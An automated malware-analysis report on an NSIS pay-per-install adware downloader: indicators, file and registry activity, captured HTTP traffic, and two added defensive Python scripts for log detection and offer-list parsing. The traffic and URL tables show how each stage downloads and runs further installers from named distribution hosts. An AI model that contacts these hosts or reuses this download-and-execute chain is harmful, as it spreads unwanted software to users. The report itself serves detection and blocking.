Trojan.NSIS.StartPage_5500256db8
not-a-virus:AdWare.Win32.AdLoad.dfqs (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 5500256db87d044cb6803ab0ce21199e
SHA1: 7db29e55a1a4110317339616eb6388355faf0a8f
SHA256: b478d66e8b067df8ab7702e4b12cfbb767ebc5218e153cbc460f5db70fa77750
SSDeep: 6144:ye34m3aaXSL0fukseJ2 YTryxbCWyWyWM8AEWyWyWt:P4LQuqNYPy811DE11q
Size: 262156 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
In this sample the trojan is a Nullsoft installer stub (NSIS 2.46; its embedded manifest, reproduced in the strings below, requests requestedExecutionLevel level="requireAdministrator") that acts as the first stage of a pay-per-install adware chain. Using the NSISdl plugin (User-Agent "NSISDL/1.2 (Mozilla)") it fetches a two-line configuration from fc-yies.website, downloads the URL named in it to %Temp%\b_setup.exe and runs it. b_setup.exe, a second NSIS stub, retrieves an offer list (launch_v5.php) and downloads cpSetup.exe, which in turn contacts an affiliate tracking redirect (capital.go2cloud.org) and the offer.php/installer.php endpoints with a list of offer ids.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:468
The Trojan starts the following dropped executables as child processes (the sandbox reports them as code-injection targets; both are files written to %Temp% by their parent, see the file activity below):
b_setup.exe:456
cpSetup.exe:1744
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\conf (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b_setup.exe (7800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\NSISdl.dll (14 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
The process b_setup.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\cpSetup.exe (6937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\591853039 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (1568 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
The process cpSetup.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu7.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00080f2b.a (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000814aa.a (1698 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu6.tmp (0 bytes)
Registry activity
Note: the Cryptography\RNG "Seed" values below are rewritten by the CryptoAPI provider whenever a process draws random bytes, the Explorer MountPoints2 "BaseClass" values are written by the shell when it enumerates drives, the Internet Settings cache paths, Shell Folders and MUICache entries under cpSetup.exe are WinINet/shell first-use initialisation, and the DirectDraw MostRecentApplication entry is written by ddraw.dll when a process initialises DirectDraw. None of these are persistence mechanisms and they should not be used as indicators for this sample.
The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 F3 F8 FD E6 7B C1 B5 D8 E5 13 9C A3 2F B2 3F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process b_setup.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A FE 25 45 22 F6 9F 4D B7 46 85 09 9D D3 98 E0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438735587"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 05 C2 6B BD C0 B8 20 DD 8C 13 07 51 37 AF DD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets the following IE security-zone mapping values (all three match Internet Explorer's default "Local intranet" options and are routinely written when WinINet initialises a fresh user profile, so on their own they are a weak indicator):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (network paths given as UNC names are mapped to the Intranet Zone)
"ProxyBypass" = "1" (sites that bypass the proxy server are mapped to the Intranet Zone)
"IntranetName" = "1" (local sites not assigned to any other zone, i.e. host names without dots, are mapped to the Intranet Zone)
Dropped PE files
| MD5 | File path |
|---|---|
| d9e445ee82bfc6966903feac88cfa872 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00080f2b.a |
| 4198c1fa188ecfe67aa04118fc6f222d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000814aa.a |
| 96e8ee1d4bf35daff7e4fec3c99d43fd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\b_setup.exe |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\NSISdl.dll |
| 1495ac32cd7281fc47706df63e4b840a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsArray.dll |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse2.tmp\NSISdl.dll |
| de991d920463129f2d46ec7c4d282e9b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 45056 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 237568 | 6056 | 6144 | 2.13941 | 1d66e3002c8233b935e22895bcb5ee34 |
The .ndata section (raw size 0, hence the MD5 of the empty string) is the uninitialised-data section NSIS gives its installer stub; together with the Nullsoft manifest in the strings below it identifies the file as an NSIS installer, and the PEiD packer match above should be read with that in mind.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://fc-yies.website/launch_reb.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI= | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic= | |
| hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4076285&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.dibida-22.xyz/offer.php?affId={aff_id}&trackingId=2332413&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho | |
| hxxp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho | |
| hxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA | |
| hxxp://up.cp-int-45.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA | |
| hxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177 | |
| hxxp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic= | |
| hxxp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake FireFox Version 2.
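The alert above fires on the spoofed Firefox 2.0.0.3 User-Agent that cpSetup.exe sends (see the Traffic section); the first-stage requests instead carry the NSISdl plugin's fixed User-Agent "NSISDL/1.2 (Mozilla)". The script below is an added example for this page, not part of the report or of the ET ruleset. It turns the same three fingerprints into a log-scanning check: the two User-Agents and the affiliate request shape (launch_*.php / stub_maker.php / installer.php / offer.php paths, affId/instId/ho_trackingid/pid/tid parameters). The tab-separated log format, the rule names and the sample lines are constructed for the example.

```python
"""Detection pass over HTTP request logs for the loader's network fingerprints.

Added example, not code from the Lavasoft report or from the ET ruleset.
The log format (ts, client, host, method, uri, user-agent, tab separated),
the rule names and SAMPLE_LOG are constructed for this example; the
User-Agent strings, paths and parameter names come from the capture.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hard-coded User-Agent of the NSISdl download plugin (seen in the strings).
NSISDL_UA = "NSISDL/1.2 (Mozilla)"
# Spoofed Firefox 2.0.x User-Agent sent by cpSetup.exe (ET POLICY fake FF2).
FAKE_FF2_UA = re.compile(r"\bFirefox/2\.0\b")
# Endpoints and query parameters of the pay-per-install back end.
PPI_PATHS = {"/launch_reb.php", "/launch_v5.php", "/stub_maker.php",
             "/installer.php", "/offer.php"}
PPI_PARAMS = {"affid", "instid", "ho_trackingid", "pid", "tid"}

# Constructed log lines: three from the capture, one benign control line.
SAMPLE_LOG = """\
2015-11-03T07:17:02Z\t10.0.0.5\tfc-yies.website\tGET\t/launch_reb.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe\tNSISDL/1.2 (Mozilla)
2015-11-03T07:17:09Z\t10.0.0.5\tcapital.go2cloud.org\tGET\t/aff_c?offer_id=4&aff_id=1006&source=11\tMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
2015-11-03T07:17:16Z\t10.0.0.5\tup.dibida-22.xyz\tGET\t/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA\tMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
2015-11-03T07:18:00Z\t10.0.0.7\texample.org\tGET\t/index.html\tMozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
"""


def classify(uri: str, user_agent: str) -> list:
    """Return the names of every rule the request matches, in a fixed order."""
    hits = []
    if user_agent.strip() == NSISDL_UA:
        hits.append("nsisdl-ua")
    if FAKE_FF2_UA.search(user_agent):
        hits.append("fake-firefox2-ua")
    parts = urlsplit(uri)
    params = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    # Either a known back-end path or at least two affiliate parameters together.
    if parts.path in PPI_PATHS or len(params & PPI_PARAMS) >= 2:
        hits.append("ppi-affiliate-uri")
    return hits


def scan(log_text: str) -> list:
    """Return (line number, host, rule names) for every line that fires a rule."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        cols = line.split("\t")
        if len(cols) < 6:
            continue  # malformed line: skip it rather than abort the pass
        _ts, _client, host, _method, uri, user_agent = cols[:6]
        hits = classify(uri, user_agent)
        if hits:
            findings.append((lineno, host, hits))
    return findings


if __name__ == "__main__":
    for lineno, host, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {host}: {', '.join(hits)}")
```

The NSISdl User-Agent is shared by every legitimate NSIS installer that downloads components, so "nsisdl-ua" on its own is only a triage hint; the combination of a suspicious User-Agent with the affiliate request shape (lines 1 and 3 of the sample) is the pairing worth alerting on.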
Traffic
GET /launch_reb.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI= HTTP/1.0
Host: fc-yies.website
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Tue, 03 Nov 2015 07:17:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 121
Connection: close
Content-Type: text/html; charset=UTF-8

s=first
u=hXXp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller
(This 121-byte body is the file the first stage writes as nse2.tmp\conf; the URL in "u" is the one it then fetches with NSISdl and saves as b_setup.exe.)
GET hXXp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177 HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 417832
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Tue, 03 Nov 2015 07:17:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 974c28f7c099ed222b7c7aa8bcbaf5da.cloudfront.net (CloudFront)
X-Amz-Cf-Id: PqyEqu2PMNugf3x16KltW882SdYsmuKYPWLljgEH2swbGiSpYSuWCA==

<<< binary body (417832 bytes, served as text/html but not text; no MZ/PE header at offset 0) skipped >>>
GET /launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic= HTTP/1.0
Host: up.int-ic-4.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1590
Connection: close
Date: Tue, 03 Nov 2015 07:17:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 22d1c3da7034c9d974fcbde908eb6a50.cloudfront.net (CloudFront)
X-Amz-Cf-Id: m5SZwd7Jx40TJpKni725UKRs1wjkM7Egxf9ZQLH2v-0T6EGlYTiDbw==

files=4
t1=dl
u1=hXXp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
t2=dl
u2=hXXp://get.file184desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4076285&d2=1505&dynamicname=sw_uninstaller
n2=setup-1228.exe
b2=ru
c2=sevenzip-2
s2=0
m2=1
d2=1500
t3=dl
u3=hXXp://VVV.amonisto.org/download.php?version=1.1.5.26&campid=2140&instid[appname]=&instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
n3=Setup__2140_il150.exe
b3=am
c3=2140-sevenzip
s3=0
m3=0
d3=0
t4=dl
u4=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=sw_uninstaller&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http:/%2Fsevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4076285
n4=SevenZip-apset.exe
b4=ap
c4=sevenzip
s4=0
m4=0
d4=0
t5=dl
u5=hXXp://sub.spirlymo.com/installers/cli/1446534132188/SevenZip_downloader-Qb8uuvhdf.exe
n5=SevenZip_downloader-Qb8uuvhdf.exe
b5=bi
c5=sevenzip-3
s5=0
m5=1
d5=1500
fn1=Components
fn2=File opener
fn3=File fin<<< skipped >>>
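The two server answers above (the launch_reb.php body that becomes nse2.tmp\conf, and the launch_v5.php offer list) are plain key=value text, one pair per line. The parser below is an added example written for this page; it is not code from the report, from Lavasoft or from the sample. The two embedded bodies are copied from the capture (offer list cut down to entries 1, 2 and 5, URLs left in the report's hXXp:// form); the field layout it assumes (offer fields suffixed with the entry number, fnN as component names, everything else as top-level metadata) is inferred from that capture, and refang and download_hosts are helper names chosen here.

```python
"""Parser for the two plain-text formats the loader's servers return.

Added example, not code from the Lavasoft report or from the malware.
CONF_BODY and OFFERS_BODY are copied from the captured traffic (offer
list shortened; hXXp:// defanging kept). The layout assumed here is
inferred from the capture: one key=value per line, offer fields carry
the entry number as suffix (t1, u1, n1 ...), fnN are component names.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Body of /launch_reb.php, i.e. the 121-byte "conf" file (from the capture).
CONF_BODY = (
    "s=first\n"
    "u=hXXp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285"
    "&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller\n"
)

# Shortened body of /launch_v5.php (entries 1, 2 and 5 from the capture).
OFFERS_BODY = (
    "files=4\n"
    "t1=dl\n"
    "u1=hXXp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller"
    "&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11\n"
    "n1=cpSetup.exe\nb1=cp\nc1=sevenzip-1\ns1=0\nm1=0\nd1=0\n"
    "t2=dl\n"
    "u2=hXXp://get.file184desktop.info/DownloadManager/Get?p=638&d=544\n"
    "n2=setup-1228.exe\nb2=ru\nc2=sevenzip-2\ns2=0\nm2=1\nd2=1500\n"
    "t5=dl\n"
    "u5=hXXp://sub.spirlymo.com/installers/cli/1446534132188/"
    "SevenZip_downloader-Qb8uuvhdf.exe\n"
    "n5=SevenZip_downloader-Qb8uuvhdf.exe\nb5=bi\nc5=sevenzip-3\n"
    "s5=0\nm5=1\nd5=1500\n"
    "fn1=Components\nfn2=File opener\n"
)

# Keys such as "u1", "fn2": letters followed by the entry number.
_INDEXED_KEY = re.compile(r"^([a-z]+?)(\d+)$")


@dataclass
class Offer:
    """One numbered download entry; fields holds t/u/n/b/c/s/m/d as captured."""
    index: int
    fields: dict = field(default_factory=dict)

    @property
    def url(self) -> str:
        return self.fields.get("u", "")

    @property
    def filename(self) -> str:
        return self.fields.get("n", "")


def parse_kv(body: str) -> list:
    """Split a body into (key, value) pairs at the first '='; other lines are ignored."""
    pairs = []
    for line in body.splitlines():
        line = line.strip()
        if "=" in line:
            key, value = line.split("=", 1)
            pairs.append((key, value))
    return pairs


def parse_conf(body: str) -> dict:
    """launch_reb.php answer: flat keys (s=first, u=<next-stage URL>)."""
    return dict(parse_kv(body))


def parse_offers(body: str):
    """launch_v5.php answer: (metadata, offers sorted by index, component names)."""
    meta, offers, names = {}, {}, {}
    for key, value in parse_kv(body):
        m = _INDEXED_KEY.match(key)
        if not m:
            meta[key] = value
            continue
        name, idx = m.group(1), int(m.group(2))
        if name == "fn":
            names[idx] = value
        else:
            offers.setdefault(idx, Offer(idx)).fields[name] = value
    return meta, [offers[i] for i in sorted(offers)], names


def refang(url: str) -> str:
    """Turn the report's hXXp:// notation back into a parseable scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def download_hosts(conf: dict, offers) -> list:
    """Sorted, de-duplicated hostnames of every download URL (blocklist material)."""
    urls = [conf.get("u", "")] + [o.url for o in offers]
    return sorted({urlsplit(refang(u)).hostname for u in urls if u})


if __name__ == "__main__":
    conf = parse_conf(CONF_BODY)
    meta, offers, names = parse_offers(OFFERS_BODY)
    for o in offers:
        print(f"offer {o.index}: {o.filename} <- {o.url}")
    print("hosts:", ", ".join(download_hosts(conf, offers)))
```

Feeding the full captured body to parse_offers gives every hostname the chain would have contacted next, which is more useful for blocking than the single download actually observed in the sandbox; the sN/mN/dN fields are carried through unchanged because the capture does not reveal their meaning.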
GET hXXp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 74792
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Tue, 03 Nov 2015 07:17:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e24fef4a7b03bd84e1e8d57f2471a84d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MRFx8oKyO31MTMzDHVaYNtr59XDeFcgVewXqba4BlcSeACv3zjk7kQ==

<<< binary body (74792 bytes, served as text/html but not text; no MZ/PE header at offset 0) skipped >>>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4076285&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.dibida-22.xyz/offer.php?affId={aff_id}&trackingId=2332413&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 Nov 2015 07:17:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02664-1028b4561ad9bf6688c33af9b8def1-1006-4-0-0-0-0-UA-2-3131-31353035-34303736323835-30-30-30-194.242.96.218-20151103021709-_-75770D34661C04016E3A685F097468746D4E0302054E23435C4C4A11373D683211373A4D276218635C; expires=Thu, 03 Dec 2015 07:17:09 GMT; path=/;
